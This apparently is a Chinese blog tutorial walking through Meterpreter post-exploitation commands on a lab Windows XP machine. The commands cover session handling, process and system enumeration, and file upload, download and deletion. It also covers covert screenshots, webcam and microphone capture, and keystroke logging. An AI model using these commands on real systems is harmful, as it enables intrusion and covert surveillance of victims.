转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86666319
核心Meterpreter命令指的是已经被Meterpreter攻击载荷成功渗透的计算机向我们提供的用于后渗透操作的基本功能。
注意:Metasploit的后渗透命令都是在拿到了目标主机的Meterpreter权限之后,在Meterpreter命令行下执行的各种命令操作。
输入help或者英文?就可以打开帮主菜单,如下所示:
这里,输出的结果比较多,我只是截取了一部分信息。
在进行渗透的时候,有时需要执行其他的任务。为了执行新的任务,需要将当前执行的Meterpreter会话切换到后台,这时就需要用到background命令。
如下:
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(windows/http/rejetto_hfs_exec) >
此时,就需要将一个会话切换到前台的时候,就可以使用sessions命令加上该会话的标识符,命令格式为sessions -i
msf5 exploit(windows/http/rejetto_hfs_exec) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows LIUYAZHUANG\lyz @ LIUYAZHUANG 192.168.175.128:4444 -> 192.168.175.130:1043 (192.168.175.130)
msf5 exploit(windows/http/rejetto_hfs_exec) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
获取机器ID的命令:machine_id
meterpreter > machine_id
[+] Machine ID: 172edb45d23942c9e4cbe768909b4f62
获取uuid的命令:uuid
meterpreter > uuid
[+] UUID: 0535181070ecda36/x86=1/windows=1/2019-01-25T01:43:55Z
这些操作可以通过channel实现
meterpreter > channel -l
Id Class Type
-- ----- ----
1 3 stdapi_process
meterpreter >
meterpreter > channel -r 1
这里,我们使用channel -l 命令列出了所有可用的通信信道,然后使用channel -r [channel-id]命令选择了读取数据的通信信道。信道子系统允许通过所有的逻辑信道进行读取、列举、写入操作,这些逻辑信道都是Meterpreter命令行实现的通信子信道。
meterpreter > machine_id
[+] Machine ID: 172edb45d23942c9e4cbe768909b4f62
meterpreter > getuid
Server username: LIUYAZHUANG\lyz
meterpreter > getpid
Current pid: 1680
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x86 0
236 672 VGAuthService.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
244 1040 wscntfy.exe x86 0 LIUYAZHUANG\lyz C:\WINDOWS\system32\wscntfy.exe
336 672 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
480 1680 hfs.exe x86 0 LIUYAZHUANG\lyz E:\©������\HFS\hfs.exe
540 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
604 540 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
608 1220 cmd.exe x86 0 LIUYAZHUANG\lyz C:\WINDOWS\system32\cmd.exe
628 540 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
672 628 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
684 628 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
860 672 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
876 672 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
944 672 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1040 672 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1132 672 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1196 672 alg.exe x86 0 C:\WINDOWS\System32\alg.exe
1224 876 wmiprvse.exe x86 0 C:\WINDOWS\system32\wbem\wmiprvse.exe
1236 672 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1416 672 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1428 608 conime.exe x86 0 LIUYAZHUANG\lyz C:\WINDOWS\system32\conime.exe
1504 628 logon.scr x86 0 LIUYAZHUANG\lyz C:\WINDOWS\System32\logon.scr
1680 1648 explorer.exe x86 0 LIUYAZHUANG\lyz C:\WINDOWS\Explorer.EXE
1808 1680 vmtoolsd.exe x86 0 LIUYAZHUANG\lyz C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1832 1680 ctfmon.exe x86 0 LIUYAZHUANG\lyz C:\WINDOWS\system32\ctfmon.exe
meterpreter > sysinfo
Computer : LIUYAZHUANG
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
pwd:查看当前的工作目录
cd:切换到目标文件夹
cd [目标文件夹]
mkdir:创建文件夹
mkdir [文件夹]
upload:将文件上传到目标系统
upload [本地文件] [目标系统路径]
edit:修改文件
edit [目标文件]
ls:列出目标主机指定目录中的文件
ls [目标文件夹]
rmr:删除目标系统上指定的文件夹
rmr [目标文件夹]
rm:删除目标系统上指定的文件
rm [目标文件]
download:从目标下载文件
download [目标文件] [本地路径]
使用enumdesktops和getdesktop可以查看被渗透主机的桌面信息,enumdesktops列出了所有可以访问的桌面,而getdesktop列出了当前桌面的相关信息,如下:
meterpreter > enumdesktops
Enumerating all accessible desktops
Desktops
========
Session Station Name
------- ------- ----
0 WinSta0 Default
0 WinSta0 Disconnect
0 WinSta0 Winlogon
0 SAWinSta SADesktop
meterpreter > getdesktop
Session 0\W\D
meterpreter >
使用screenshot命令
meterpreter > screenshot
Screenshot saved to: /root/iOOsMPCB.jpeg
截图的结果:
webcam_list
webcam_stream
webcam_snap
某些时候我们可能处于监视目的需要进行环境监听,就可以使用record_mic命令。
meterpreter > record_mic
[*] Starting...
[*] Stopped
Audio saved to: /root/hStZovMr.wav
也可以使用record_mic命令加上-d参数制定录音的长度,这个参数单位是秒。
idletime
meterpreter > idletime
User has been idle for: 21 mins 19 secs
meterpreter > keyscan_start
Starting the keystroke sniffer ...
meterpreter > keyscan_dump
Dumping captured keystrokes...
meterpreter > keyscan_stop
Stopping the keystroke sniffer...
meterpreter >